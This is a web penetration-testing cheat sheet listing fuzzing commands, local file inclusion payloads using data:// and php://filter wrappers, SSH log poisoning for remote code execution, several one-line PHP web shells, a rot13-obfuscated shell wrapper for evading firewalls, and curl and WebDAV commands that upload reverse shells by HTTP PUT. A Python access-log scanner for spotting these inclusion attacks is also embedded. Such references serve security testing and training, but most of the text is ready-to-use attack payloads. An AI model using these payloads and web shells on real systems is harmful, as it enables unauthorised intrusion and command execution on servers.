# Web useful commands
{: .no_toc }

## Table of contents
{: .no_toc .text-delta }

1. TOC
{:toc}

## Quick References

### Fuzzing

```bash
dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
dirb http://10.0.0.10 -X .htm,.html,.php
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt http://10.0.0.10/test.php?file=FUZZ
```

### Create wordlist

```bash
cewl -w /root/Desktop/words.txt -m 6 https://example.com
```

### WAF detection

```bash
wafw00f http://192.168.56.102
```

### Upload Files

```bash
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
```

## General Exploitation

### LFI

#### Simple RFI

```
page=data://text/plain, <?php system("whoami");?>
```

#### Base64 encoded RFI

```
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==
lang=php://filter/convert.base64-encode/resource=index
```

#### Mini shell

```
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id
```

#### Base64 + URL encoded mini shell

```
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id
```

### RCE with LFI and SSH log poisoning

From

```bash
ssh '<?php system($_GET['c']); ?>'@192.168.0.23
```

```
http://192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=id
```
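The inclusion payloads in this section leave recognisable traces in the web server's access log: PHP stream wrappers (`data://`, `php://filter`) in a query parameter, or a request that includes a writable log such as `/var/log/auth.log`. The following Python scanner is an added example, not part of the original cheat sheet; the access-log lines, the indicator list and the `scan_access_log` function name are all constructed here for illustration.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access log lines (sample data, not from a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532
10.0.0.7 - - [10/Mar/2024:12:00:02 +0000] "GET /index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id HTTP/1.1" 200 87
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /index.php?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 4210
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /lfi/lfi.php?file=/var/log/auth.log&c=id HTTP/1.1" 200 9001
10.0.0.5 - - [10/Mar/2024:12:00:05 +0000] "GET /static/logo.png HTTP/1.1" 200 512
"""

# Pull method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators tied to the techniques above: the data:// and php:// wrappers reaching
# an unvalidated include(), inclusion of an attacker-writable log, and plain traversal.
INDICATORS = [
    ("php_stream_wrapper", re.compile(r"(?:data|php)://", re.I)),
    ("log_file_inclusion", re.compile(r"/var/log/(?:auth|apache2|httpd|nginx)", re.I)),
    ("traversal", re.compile(r"(?:\.\./){2,}")),
]

def decode_target(target: str) -> str:
    """Undo up to two rounds of URL encoding so %2B-style encoding does not hide a wrapper."""
    decoded = target
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded

def scan_access_log(log_text: str) -> list[dict]:
    """Return one finding per request line whose decoded target matches an indicator."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed or non-request line
        target = decode_target(m.group("target"))
        hits = [name for name, rx in INDICATORS if rx.search(target)]
        if hits:
            findings.append({"line": lineno, "client": line.split()[0],
                             "indicators": hits, "target": target})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']}: {', '.join(f['indicators'])} -> {f['target']}")
```

On the constructed sample this flags lines 2 to 4 and leaves the ordinary page and image requests alone; a 200 response on a flagged line is the signal worth chasing, since it means the include succeeded.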

### PHP shell WAF escape

#### Urlencode and rot13 encode

```php
<?php

$enc = <<<ENC
__ENCODED PHP SHELL HERE__
ENC;

assert(urldecode(str_rot13($enc)));
?>
```

#### Use

```php
<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php $c=$_GET['c']; echo `$c`; ?>
```

## Insecure Methods

### Methods Testing

```bash
nc <IP> <PORT>
```

```
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x
```

### TRACE

```
telnet www.victim.com 80
> TRACE / HTTP/1.1
> Host: www.victim.com
```

```bash
curl -k -s -i -X TRACE https://IP -H "Cookies: Reflected"
```

### PUT

```bash
curl http://192.168.40.130/test/ --upload-file /root/Desktop/curl.php -v

curl --upload-file php-reverse-shell.txt -v --url http://192.168.40.130/test/shell.php -0 --http1.0

curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage

curl -X PUT -d "text or data to put" http://www.victim.com/destination_page

curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
```

```bash
cadaver http://<IP>/dav/
put /root/Desktop/shell.php
```

## References

- http://pentestmonkey.net
